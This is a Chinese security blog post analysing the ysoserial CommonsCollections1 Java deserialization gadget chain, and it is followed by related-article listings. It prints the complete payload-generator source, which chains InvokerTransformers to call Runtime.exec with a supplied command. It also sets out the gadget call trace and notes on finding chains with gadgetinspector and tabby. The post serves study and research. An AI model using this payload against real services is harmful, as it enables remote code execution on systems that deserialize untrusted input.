ysoserial Common-Collections1利用链解析(四)

最新推荐文章于 2023-09-25 13:54:13 发布
最新推荐文章于 2023-09-25 13:54:13 发布
阅读量262 收藏
点赞数
分类专栏: Java安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zirandu/article/details/120147784
版权

0x01 ysoserial commoncollection1源码

@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.FROHOFF })
public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {

	public InvocationHandler getObject(final String command) throws Exception {
		final String[] execArgs = new String[] { command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String.class }, execArgs),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);

		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return handler;
	}

	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(CommonsCollections1.class, args);
	}

	public static boolean isApplicableJavaVersion() {
        return JavaVersion.isAnnInvHUniversalMethodImpl();
    }
}

其中Gadget Chain注释中已经给出

ObjectInputStream.readObject()
	AnnotationInvocationHandler.readObject()
		Map(Proxy).entrySet()
			AnnotationInvocationHandler.invoke()
				LazyMap.get()
					ChainedTransformer.transform()
						ConstantTransformer.transform()
						InvokerTransformer.transform()
							Method.invoke()
								Class.getMethod()
						InvokerTransformer.transform()
							Method.invoke()
								Runtime.getRuntime()
						InvokerTransformer.transform()
							Method.invoke()
								Runtime.exec()

0x02 使用gadgetinspector挖掘

https://github.com/JackOfMostTrades/gadgetinspector

wget http://central.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
java -Xmx2G -jar build/libs/gadget-inspector-all.jar commons-collections-3.2.1.jar

在gadget-chains.txt中如下

com/sun/corba/se/spi/orbutil/proxy/CompositeInvocationHandlerImpl.invoke(Ljava/lang/Object;Ljava/lang/reflect/Method;[Ljava/lang/Object;)Ljava/lang/Object; (-1)
  com/sun/corba/se/spi/orbutil/proxy/CompositeInvocationHandlerImpl.invoke(Ljava/lang/Object;Ljava/lang/reflect/Method;[Ljava/lang/Object;)Ljava/lang/Object; (0)
  org/apache/commons/collections/map/DefaultedMap.get(Ljava/lang/Object;)Ljava/lang/Object; (0)
  org/apache/commons/collections/functors/InvokerTransformer.transform(Ljava/lang/Object;)Ljava/lang/Object; (0)
  java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

上述入口是 CompositeInvocationHandlerImpl、DefaultedMap 而不是 ysoserial 中给出的 AnnotationInvocationHandler、LazyMap,但其实两者大体相同。 

0x03 使用tabby挖掘

https://github.com/wh1t3p1g/tabby

项目中介绍到暂未覆盖 cc1 和 cc3,因为用到了代理模式

0x0A 参考

gadgetinspector

https://github.com/JackOfMostTrades/gadgetinspector

tabby

https://github.com/wh1t3p1g/tabby

phantom0409
关注
专栏目录
commons-collections-3.2.2-API文档-中文版.zip
05-01
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
java反序列化漏洞利用工具_Java 反序列化工具 gadgetinspector 初窥--上篇
weixin_39853892的博客
12-02 399
作者:Longofo@知道创宇404实验室时间:2019年9月4日原文接:https://paper.seebug.org/1034/Java 反序列化工具 gadgetinspector 初窥--下篇起因一开始是听@Badcode师傅说的这个工具,在Black Hat 2018的一个议题提出来的。这是一个基于字节码静态分析的、利用已知技巧自动查找从source到sink的反序列化利用工具。看...
【WEB安全】Xstream最新反序列化poc执行报错问题
HBohan的博客
12-10 1623
最近有个需求,用Xstream反序列化打个内存马,从通用性来讲,肯定用1.4.17的洞去打应用范围最广。众所周知,Xstream官方会提供其漏洞的poc。在我实验之下,1.4.17的几个poc只要涉及到任意java代码执行的都会报错,纯调用java.lang.Runtime.exec()的却不会报错。在我调试之下发现了其奥秘,本文就是解决Xstream任意java代码执行报错的问题。
从JSON1中学习处理JACKSON的不稳定性五
最新发布
stopluox的博客
09-25 115
本文学习了 JSON1 ,使用 Spring AOP 中的 JdkDynamicAopProxy 作为 gadget,修改 JACKSON ,将以随机顺序触发 TemplatesImpl 上的所有 getter , 转换成了只触发 getOutputProperties ,避免了 JACKSON 的不稳定性,同时, JACKSON 依然可以在 SpringBoot 环境下直接使用。
ysoserial反序列化gadget原理-part1:URLDNS/CommonsCollections1
mole_exp的博客
01-27 3075
文章目录前言URLDNS依赖payload构造gadget原理简述Groovy1依赖payload构造gadgetCommons-Beanutils1 前言 其实反序列化利用分析的文章写起来没啥意思,无非就是函数调用栈的复述,序列化对象(payload)的构造无非就是为了满足某条函数调用的路径而已。如果没有亲自调试过,也是看不懂别人的文章的。但好记性不如烂笔头,况且笔者记性也不是很好,所以还是来篇流水账记录一下之前的学习。 URLDNS 依赖 无 payload构造 注:ysoserial工具里说的pa
JDK的动态代理深入解析(Proxy,InvocationHandler)(转)
weixin_34160277的博客
12-03 411
一、什么是动态代理   动态代理可以提供对另一个对象的访问,同时隐藏实际对象的具体事实。代理一般会实现它所表示的实际对象的接口。代理可以访问实际对象,但是延迟实现实际对象的部分功能,实际对象实现系统的实际功能,代理对象对客户隐藏了实际对象。客户不知道它是与代理打交道还是与实际对象打交道。   目的:主要用来做方法的增强,让你可以在不修改源码(不用改变这个方法的签名,原来调用这个方法的...
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom;...
commons-collections-3.2.2-API文档-中英对照版.zip
04-20
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
commons-collections-3.2.2.jar
05-30
apache-common系列中的重要的成员:apache-common-collections。包中对Java中的集合类进行了一定的补充,定义了一些全新的集合,当然也是实现了Collection接口的,比如Bag,BidiMap。同时拥有新版本的原有集合,比如...
commons-collections-3.2.1-API文档-中文版.zip
04-08
赠送jar包:commons-collections-3.2.1.jar; 赠送原API文档:commons-collections-3.2.1-javadoc.jar; 赠送源代码:commons-collections-3.2.1-sources.jar; 包含翻译后的API文档:commons-collections-3.2.1-javadoc-API文档-中文(简体)版.zip 对应Maven信息:groupId:commons-collections,artifactId:commons-collections,version:3.2.1 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
java动态代理原理及解析
热门推荐
简单世界的博客
09-06 8万+
java动态代理, jdk反射与代理模式
java反序列化漏洞利用工具_Java 反序列化漏洞
weixin_39588432的博客
12-02 678
序列化和反序列化序列化:将对象转换成字节序列存储(文件、内存、数据库),对应 Java 原生序列化的 writeObject反序列化:将字节序列转换成对象,对应 Java 原生序列化的 readObject序列化作用不同系统、进程间的数据传输(RPC、HTTP )Java RMI、Java Bean保存信息,便于 JVM 启动时直接使用序列化条件该类必须实现 java.io.Serializabl...
Java 动态代理类
洞玄之境的博客
07-24 1万+
一、什么是代理? 代理是一种常用的设计模式,其目的就是为真实对象提供一个代理对象以控制对真实对象的访问。代理类负责为委托类(被代理类、真实类)预处理消息,过滤消息并转发消息,以及进行消息被委托类执行后的后续处理。 为了保持行为的一致性,代理类和委托类通常会实现相同的接口,所以在访问者看来两者没有丝毫的区别。通过代理类这中间一层,能有效控制对委托类对象的直接访问,也可以很好地隐藏和保护委托类...
ysoserial Common-Collections1利用解析(三)
phantom的博客
09-06 214
(二)中所示代码和ysoserial中有所不同,ysoserial中的CommonCollections1利用中用的是LazyMap而不是TransformedMap。 TransformedMap可以参考以下接 长亭科技:https://blog.chaitin.cn/2015-11-11_java_unserialize_rce/ LazyMap和TransformedMap类似,都来自Common-Collections库,并继承了 AbstractMapDecorator。LazyM.
ysoserial Common-Collections1利用解析(二)
phantom的博客
09-05 130
在(一)中构造了一个简单的Demo演示了ysoserial利用common-collections构造payload的过程,但实际利用过程中会遇到很多问题。 package commoncollections1_real; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commo
tabby原理分析
band_mmbx的博客
08-10 939
是一款基于实现的java静态代码分析工具,用于分析jar包,生成代码属性图。结合手工可以半自动地完成java反序列化挖掘工作。我们从tabby的源代码进行分析,根据源代码的逻辑结构,可以看出其工作流程分成下面几个部分其中使用soot进行污点分析的部分是本文的重点。...
ysoserial CommonsColletions1分析
洋洋的小黑屋
05-21 116
JAVA安全审计 ysoserial CommonsColletions1分析 前言: 在ysoserial工具中,并没有使用TransformedMap的来触发ChainedTransformer,而是用了LazyMap的get方法 CommonsCollections1 调用: /* Gadget chain: ObjectInputStream.readObject() A...
Commons Collections Java反序列化漏洞深入分析
大树叶 技术专栏
04-27 1万+
http://www.myhack58.com/Article/html/3/62/2015/69493.htm 今年目前为止Java方面影响力最大的漏洞莫过于这段时间持续火热的CommonsCollections反序列化漏洞了。 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Com
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值